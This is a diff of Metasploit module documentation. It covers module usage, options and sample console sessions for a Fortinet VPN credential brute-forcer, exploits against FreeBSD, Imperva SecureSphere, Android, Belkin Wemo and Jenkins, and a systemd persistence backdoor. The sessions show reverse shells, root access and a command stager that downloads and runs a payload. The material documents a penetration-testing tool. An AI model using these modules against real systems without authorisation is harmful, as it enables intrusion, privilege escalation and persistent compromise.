+printed to the console, like a background job in other shells.
+
+Usage
+-----
+
+### Flags
+
+#### -h
+
+Display the help banner.
+
+#### -i JOB_ID
+
+Show details of the specified `JOB_ID`, including the name and the time
+the job was started.
+
+#### -K
+
+Stop all currently running jobs.
+
+#### -k JOB_IDS
+
+Stop the specified list of jobs. See [msfconsole > Building ranges and
+lists](../msfconsole.md#building-ranges-and-lists) for more details on
+how to build ranges.
+
+#### -l
+
+List all the currently running jobs. This is the default action. Module
+name, payload, and some payload configuration is shown when present.
+
+#### -P
+
+Save each of the currently running jobs to be restarted when
+`msfconsole` is started. Only valid for jobs running payload handlers.
+See [Persistence](#persistence) below.
+
+#### -p JOB_IDS
+
+Save the specified list of jobs to restarted when `msfconsole` is
+started. Only valid for jobs running payload handlers. See
+[Persistence](#persistence) below and [msfconsole > Building ranges and
+lists](../msfconsole.md#building-ranges-and-listss) for how to specify
+a list of `JOB_IDS`.
+
+#### -S FILTER
+
+Apply a search filter for the output. Currently ignored.
+
+#### -v
+
+Show verbose information with `-i` and `-l`. When combined with `-i`,
+display the advanced options given to the module run. When combined
+with `-l` or no other flags, displays an expanded table of jobs, adding
+the URI for HTTP payload handlers, start time, handler options (if
+present), and whether the job has been persisted with `-p` or `-P`.
+
+Persistence
+-----------
+
+The `-P` and `-p JOB_IDS` flags save payload handler jobs to be started
+every time `msfconsole` is started. This works by saving the
+information needed to start an equivalent `exploit/multi/handler` run
+as a JSON blob in the job persistence file, `~/.msf4/persist` by
+default.
+
+Examples
+--------
+
+Starting a module as a job:
+
+    msf5 exploit(multi/handler) > run -j
+    [*] Exploit running as background job 1.
+
+A verbose listing of all the jobs:
+
+    msf5 exploit(multi/handler) > jobs -v
+    
+    Jobs
+    ====
+    
+      Id  Name                    Payload                          Payload opts          URIPATH  Start Time                 Handler opts  Persist
+      --  ----                    -------                          ------------          -------  ----------                 ------------  -------
+      1   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://127.0.0.1:4444           2019-02-20 19:02:58 -0600                true
+
+Set some jobs to be started on `msfconsole` start:
+
+    msf5 exploit(multi/handler) > jobs -p 1-2
+    Added persistence to job 1.
+    Added persistence to job 2.
+
+Getting information about a specific job:
+
+    msf5 exploit(multi/handler) > jobs -i 1
+    
+    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
+    msf5 exploit(multi/handler) > jobs -i 1 -v
+    
+    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
+    
+    Module advanced options:
+    
+       Name                    Current Setting  Required  Description
+       ----                    ---------------  --------  -----------
+       ContextInformationFile                   no        The information file that contains context information
+       DisablePayloadHandler   false            no        Disable the handler code for the selected payload
+       EnableContextEncoding   false            no        Use transient context when encoding payloads
+       ExitOnSession           true             yes       Return from the exploit after a session has been created
+       ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
+       VERBOSE                 false            no        Enable detailed status messages
+       WORKSPACE                                no        Specify the workspace for this module
+       WfsDelay                0                no        Additional delay when waiting for a session
@@ -0,0 +1,40 @@
+This module tests credentials on Fortinet SSL VPN servers (FortiGate).
+
+NOTE: This module is only executing when Fortinet SSL VPN Server is detected.
+When the server cannot be verified the module stops working.
+The realm/domain is used for every request when set.
+
+The module supports IPv6 requests.
+The module supports several hosts at the same time.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/fortinet_ssl_vpn```
+2. Do: ```set RHOSTS [IP]```
+3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
+4. Do: ```run```
+
+## Scenarios
+
+IP-Addresses have been masked with x
+
+```
+msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run
+
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive...
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - Starting login brute force...
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 1 of 2 hosts (50% complete)
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Server is responsive...
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Starting login brute force...
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -9,19 +9,21 @@ This module can abuse misconfigured web servers to upload and delete web content
 4. Do: ```set PATH [PATH]```
 5. Do: ```set FILENAME [FILNAME]```
 6. Do: ```set FILEDATA [PATH]```
-7. DO: ```run```
+7. Do: ```run```

 ## Options 

 ### ACTION

+Set `ACTION` to either `PUT` or `DELETE`. (Default: `PUT`)
+
 **PUT**

 Action is set to PUT to upload files to the server. If `FILENAME` isn't specified, the module will generate a random string as a .txt file.

 **DELETE** 

-Deletes the file specified in the `FILENAME` option. (default: `msf_http_put_test.txt`)
+Deletes the file specified in the `FILENAME` option (Default: `msf_http_put_test.txt`). `FILENAME` is required when Action is set to DELETE. 

 ### PATH

@@ -29,16 +31,15 @@ The path at which this module will attempt to either PUT the content or DELETE i

 ### FILEDATA

-The file whose data is to be uploaded. 
+The content to put in the uploaded file when `ACTION` is set to `PUT`.
+

 ## Scenarios

-Here Action is set to `PUT`.
+Here `ACTION` is by default set to `PUT`.

 ```
 msf > use auxiliary/scanner/http/http_put
-msf auxiliary(scanner/http/http_put) > set ACTION PUT
-ACTION => PUT
 msf auxiliary(scanner/http/http_put) > set RHOSTS 1.1.1.23
 RHOSTS => 1.1.1.23
 msf auxiliary(scanner/http/http_put) > set RPORT 8585
@@ -0,0 +1,20 @@
+## Description
+
+  This module scans a JBoss instance for a few vulnerabilities.
+
+## Vulnerable Software
+
+  The JBoss Enterprise Application Platform (or JBoss EAP) is a
+  subscription-based/open-source Java EE-based application
+  server runtime platform used for building, deploying, and
+  hosting highly-transactional Java applications and services
+
+  This module has been successfully tested on:
+
+  * Apache-Coyote/1.1 ( Powered by Servlet 2.4; JBoss-4.2.0.GA (build: SVNTag=JBoss_4_2_0_GA date=200705111440)/Tomcat-5.5 )
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/http/jboss_vulnscan```
+  2. Do: ```set RHOSTS [IP]```
+  3. Do: ```run```
@@ -7,15 +7,22 @@ This module scrapes data from a specific web page based on a regular expression.
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```run```

+## Options
+
+### PATH 
+
+The path from where the data is to be scraped from.
+ 
+### PATTERN
+
+A regular expression to capture data from webpage. Default value:`<title>(.*)</title>` which simply grabs the page title.
+
 ## Scenarios
-By default this module scrapes the `title` of a web page.

 ```
 msf > use auxiliary/scanner/http/scraper
 msf auxiliary(scanner/http/scraper) > set RHOSTS 1.1.1.18
 RHOSTS => 1.1.1.18
-msf auxiliary(scanner/http/scraper) > set PATTERN '<title>(.*)</title>'
-PATTERN => (?-mix:<title>(.*)<\/title>)
 msf auxiliary(scanner/http/scraper) > run 

 [+] 1.1.1.18 / [Index of /]
@@ -24,3 +31,5 @@ msf auxiliary(scanner/http/scraper) > run
 msf auxiliary(scanner/http/scraper) >
 ```

+The title of `1.1.1.18/` page is `Index of /`.
+
@@ -0,0 +1,60 @@
+## Description
+
+This module check and exploits a Directory Traversal vulnerability in Total.js framework < 3.2.4 (CVE-2019-8903). Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml, woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache, manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic.
+
+## Vulnerable Application
+
+Affecting total.js package, versions:
+
+* >=2.1.0 <2.1.1
+* >=2.2.0 <2.2.1
+* >=2.3.0 <2.3.1
+* >=2.4.0 <2.4.1
+* >=2.5.0 <2.5.1
+* >=2.6.0 <2.6.3
+* >=2.7.0 <2.7.1
+* >=2.8.0 <2.8.1
+* >=2.9.0 <2.9.5
+* >=3.0.0 <3.0.1
+* >=3.1.0 <3.1.1
+* >=3.2.0 <3.2.4
+
+## Verification Steps
+
+1. On a Node v8 environment do: `npm install total.js@3.2.3`
+2. Install an app on top of the Total.js framework, something like [Total.js CMS](https://github.com/totaljs/cms)
+  * `git clone https://github.com/totaljs/cms.git`
+  * `cd cms && npm install`
+3. Start `msfconsole`
+4. `use auxiliary/scanner/http/totaljs_traversal`
+5. `set RHOST <IP>`
+6. `set RPORT <PORT>`
+7. `run`
+8. Verify you get Total.js version if the target is vulnerable!
+
+## Options
+
+* **TARGETURI**: Path to Total.js App installation (“/” is the default)
+* **DEPTH**: Traversal depth (“1” is the default)
+* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+
+## Scenario
+
+### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0
+
+```
+msf5 > use auxiliary/scanner/http/totaljs_traversal 
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59
+RHOST => 192.168.2.59
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320
+RPORT => 8320
+msf5 auxiliary(scanner/http/totaljs_traversal) > run
+[*] Running module against 192.168.2.59
+
+[*] Total.js version is: ^3.2.0
+[*] App name: CMS
+[*] App description: A simple and powerful CMS solution written in Total.js / Node.js.
+[*] App version: 12.0.0
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/totaljs_traversal) >
+```
@@ -0,0 +1,57 @@
+## Description
+
+This module uses the su binary present on rooted devices to run a payload as root.
+
+A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
+This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
+temporary directory, make it executable, execute it in the background, and finally delete the executable.
+
+On most devices the su binary will pop-up a prompt on the device asking the user for permission.
+
+## Vulnerable Application
+
+This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
+Many devices can be rooted by flashing new firmware, however the existing data will be lost.
+
+## Verfication steps
+
+You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)
+
+Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. 
+An example session follows:
+
+```
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                        Information         Connection
+  --  ----  ----                        -----------         ----------
+  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)
+
+msf5 exploit(multi/handler) > use exploit/android/local/su_exec
+msf5 exploit(android/local/su_exec) > set SESSION 1
+SESSION => 1
+msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
+payload => linux/aarch64/meterpreter/reverse_tcp
+msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
+LHOST => 192.168.0.176
+msf5 exploit(android/local/su_exec) > set LPORT 4445
+LPORT => 4445
+msf5 exploit(android/local/su_exec) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.0.176:4445
+[*] Transmitting intermediate midstager...(256 bytes)
+[*] Sending stage (818780 bytes) to 192.168.0.107
+[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
+[-] Exploit failed: Rex::TimeoutError Operation timed out.
+[*] Exploit completed, but no session was created.
+
+```
+
+Please not that in most cases you will have to manually confirm the Superuser prompt 
+on the device itself before the module completes. You can do `set WfsDelay 10` to
+give yourself more time.
+
@@ -0,0 +1,106 @@
+## Description
+
+  This module exploits a vulnerability in the FreeBSD kernel,
+  when running on 64-bit Intel processors.
+
+  By design, 64-bit processors following the X86-64 specification will
+  trigger a general protection fault (GPF) when executing a SYSRET
+  instruction with a non-canonical address in the RCX register.
+
+  However, Intel processors check for a non-canonical address prior to
+  dropping privileges, causing a GPF in privileged mode. As a result,
+  the current userland RSP stack pointer is restored and executed,
+  resulting in privileged code execution.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * FreeBSD 8.3-RELEASE (amd64)
+  * FreeBSD 9.0-RELEASE (amd64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/freebsd/local/intel_sysret_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### FreeBSD 9.0-RELEASE
+
+  ```
+  msf5 > use exploit/freebsd/local/intel_sysret_priv_esc 
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188
+  lhost => 123.123.123.188
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 123.123.123.188:4444 
+  [+] FreeBSD version 9.0-RELEASE appears vulnerable
+  [+] System architecture amd64 is supported
+  [+] hw.model: Intel(R) Core(TM) i9-1337 CPU @ 9.99GHz is vulnerable
+  [*] Writing '/tmp/.mTaR4rAPd.c' (4781 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 4781 bytes in 1 chunks of 17475 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.LBGkIVh' (218 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
+  [*] Launching exploit...
+  [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+  [*] 
+  [*] [*] Retrieving host information...
+  [*]     [+] CPU: GenuineIntel
+  [*]     [+] sysname: FreeBSD
+  [*]     [+] release: 9.0-RELEASE
+  [*]     [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
+  [*]     [+] machine: amd64
+  [*] [*] Validating target OS and version...
+  [*]     [+] Vulnerable :-)
+  [*] [*] Resolving kernel addresses...
+  [*]     [+] Resolved Xofl to 0xffffffff80b02e70
+  [*]     [+] Resolved Xbnd to 0xffffffff80b02ea0
+  [*]     [+] Resolved Xill to 0xffffffff80b02ed0
+  [*]     [+] Resolved Xdna to 0xffffffff80b02f00
+  [*]     [+] Resolved Xpage to 0xffffffff80b03240
+  [*]     [+] Resolved Xfpu to 0xffffffff80b02fc0
+  [*]     [+] Resolved Xalign to 0xffffffff80b03080
+  [*]     [+] Resolved Xmchk to 0xffffffff80b02f60
+  [*]     [+] Resolved Xxmm to 0xffffffff80b02ff0
+  [*] [*] Setup...
+  [*]     [+] Trigger code...
+  [*]     [+] Trampoline code...
+  [*] [*] Fire in the hole!
+  [*] [*] Got root!
+  [+] Success! Executing payload...
+  [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
+  [+] Deleted /tmp/.mTaR4rAPd.c
+  [+] Deleted /tmp/.mTaR4rAPd
+  [+] Deleted /tmp/.LBGkIVh
+
+  id
+  uid=0(root) gid=0(wheel) groups=0(wheel)
+  uname -a
+  FreeBSD freebsd-9-0 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
+  ```
+
@@ -0,0 +1,205 @@
+## Description
+
+This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode.
+
+## Vulnerable Application
+
+Imperva SecureSphere 13.0/13.1/13.2
+
+## Verification Steps
+
+1. `use exploit/linux/http/imperva_securesphere_exec`
+2. `set RHOST [TARGET IP]`
+3. `set PASS [Agent registration password]` if the target has been set to gateway mode
+4. Run `check`
+5. Verify that the result is `The target is vulnerable.`
+6. `set payload linux/x64/meterpreter/reverse_tcp`
+7. `set LHOST [IP]`
+8. Run `exploit`
+9. Verify that the reverse shell is obtained
+
+## Scenarios
+
+Imperva Secure 13.0 Pre-FTL mode:
+```
+msf5 > use exploit/linux/http/imperva_securesphere_exec
+msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
+RHOST => 192.168.146.201
+msf5 exploit(linux/http/imperva_securesphere_exec) > check
+[+] 192.168.146.201:443 The target is vulnerable.
+msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
+LHOST => 192.168.146.215
+msf5 exploit(linux/http/imperva_securesphere_exec) > show options
+
+Module options (exploit/linux/http/imperva_securesphere_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASS                        no        Agent registration password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.146.201  yes       The target address range or CIDR identifier
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Use SSL
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pws/impcli      no        The URI path to impcli
+   TIMEOUT    3                no        HTTP connection timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USER       imperva          no        Agent registration username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.146.215  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Imperva SecureSphere 13.0/13.1/13.2
+
+
+msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.215:4444
+[*] Sending payload linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (816260 bytes) to 192.168.146.201
+[*] Command Stager progress - 100.00% done (1321/1321 bytes)
+
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 4965 created.
+Channel 1 created.
+id
+uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
+/sbin/ifconfig
+eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
+          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
+          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:1331 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:825 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:1790319 (1.7 MiB)  TX bytes:83116 (81.1 KiB)
+
+lo        Link encap:Local Loopback
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.146.201 - Meterpreter session 1 closed.  Reason: User exit
+```
+
+Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):
+```
+msf5 > use exploit/linux/http/imperva_securesphere_exec
+msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
+RHOST => 192.168.146.201
+msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
+PASS => lshy5782%lsLS
+msf5 exploit(linux/http/imperva_securesphere_exec) > check
+[+] 192.168.146.201:443 The target is vulnerable.
+msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
+LHOST => 192.168.146.215
+msf5 exploit(linux/http/imperva_securesphere_exec) > show options
+
+Module options (exploit/linux/http/imperva_securesphere_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASS       lshy5782%lsLS    no        Agent registration password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.146.201  yes       The target address range or CIDR identifier
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Use SSL
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pws/impcli      no        The URI path to impcli
+   TIMEOUT    3                no        HTTP connection timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USER       imperva          no        Agent registration username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.146.215  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Imperva SecureSphere 13.0/13.1/13.2
+
+
+msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.215:4444
+[*] Sending payload linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (816260 bytes) to 192.168.146.201
+[*] Command Stager progress - 100.00% done (1321/1321 bytes)
+
+meterpreter > sysinfo
+Computer     : 192.168.146.201
+OS           : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 19634 created.
+Channel 1 created.
+id
+uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
+/sbin/ifconfig
+eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
+          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
+          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:651 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:451 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:894174 (873.2 KiB)  TX bytes:37181 (36.3 KiB)
+
+lo        Link encap:Local Loopback
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:153 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:153 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:21579 (21.0 KiB)  TX bytes:21579 (21.0 KiB)
+
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.146.201 - Meterpreter session 1 closed.  Reason: User exit
+```
@@ -5,9 +5,10 @@
 1. Kali 2.0 (System V)
 2. Ubuntu 14.04 (Upstart)
 3. Ubuntu 16.04 (systemd)
-4. Centos 5 (System V)
-5. Fedora 18 (systemd)
-6. Fedora 20 (systemd)
+4. Ubuntu 16.04 (systemd user)
+5. Centos 5 (System V)
+6. Fedora 18 (systemd)
+7. Fedora 20 (systemd)

 ## Verification Steps

@@ -36,7 +37,7 @@
 0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
 1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot).  This logs to syslog or /var/log/<process>.log and .err
 2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
-3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever.
+3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.

 **SHELLPATH**
  
@@ -252,3 +253,53 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
    [*] Started reverse handler on 192.168.199.128:4444 
    [*] Starting the payload handler...
    [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
+
+### systemd user (Ubuntu 16.04 Server - vagrant)
+
+    msf5 exploit(linux/local/service_persistence) > options
+
+    Module options (exploit/linux/local/service_persistence):
+
+       Name        Current Setting  Required  Description
+       ----        ---------------  --------  -----------
+       SERVICE                      no        Name of service to create
+       SESSION     -1               yes       The session to run this module on.
+       SHELLPATH   /tmp             yes       Writable path to put our shell
+       SHELL_NAME                   no        Name of shell file to write
+
+
+    Payload options (cmd/unix/reverse_netcat):
+
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+
+
+    Exploit target:
+
+       Id  Name
+       --  ----
+       4   systemd user
+
+
+    msf5 exploit(linux/local/service_persistence) > run
+
+    [!] SESSION may not be compatible with this module.
+    [*] Started reverse TCP handler on 172.28.128.1:4444
+    [*] Writing backdoor to /tmp/PPpCF
+    [*] Max line length is 65537
+    [*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
+    [*] Creating user service directory
+    [*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
+    [*] Max line length is 65537
+    [*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
+    [*] Reloading manager configuration
+    [*] Enabling service
+    [*] Starting service: OzzdRBC
+    [*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600
+
+    id
+    uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
+    uname -a
+    Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
@@ -33,6 +33,9 @@ msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run

 [*] Started reverse TCP handler on 10.22.22.4:4444
 [+] Wemo-enabled device detected
+[*] Found firmware version: 2.00.6461
+[+] Firmware version 2.00.6461 < 2.00.8643
+[*] 10.22.22.1:49152 - The target appears to be vulnerable.
 [*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
 [*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
 [*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
@@ -0,0 +1,76 @@
+## Intro
+
+This module exploits a vulnerability in Jenkins dynamic routing to
+bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
+download and execute a malicious JAR file.
+
+The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
+on later versions of Jenkins.
+
+Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
+
+## Setup
+
+1. `git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc`
+2. `cd cve-2019-1003000-jenkins-rce-poc/sample-vuln`
+3. Edit `run.sh` and change `2.152-alpine` to `2.137`
+4. `./run.sh`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)
+```
+
+## Options
+
+**RPORT**
+
+Set this to the Jenkins port. The default is 8080.
+
+**TARGETURI**
+
+Set this to the Jenkins base path. The default is `/`.
+
+**SRVPORT**
+
+Set this to the port on which to serve the payload. Change it from 8080
+to something like 8081 if you are testing Jenkins locally on port 8080.
+
+**ForceExploit**
+
+Set this to `true` to override the `check` result during exploitation.
+
+## Usage
+
+```
+msf5 exploit(multi/http/jenkins_metaprogramming) > run
+
+[*] Started HTTPS reverse handler on https://192.168.1.2:8443
+[*] Jenkins 2.137 detected
+[+] Jenkins 2.137 is a supported target
+[+] ACL bypass successful
+[*] Using URL: http://0.0.0.0:8081/
+[*] Local IP: http://192.168.1.2:8081/
+[*] Sending Jenkins and Groovy go-go-gadgets
+[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
+[-] Sending 404
+[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
+[+] Sending 200
+[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
+[+] Sending payload JAR
+[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
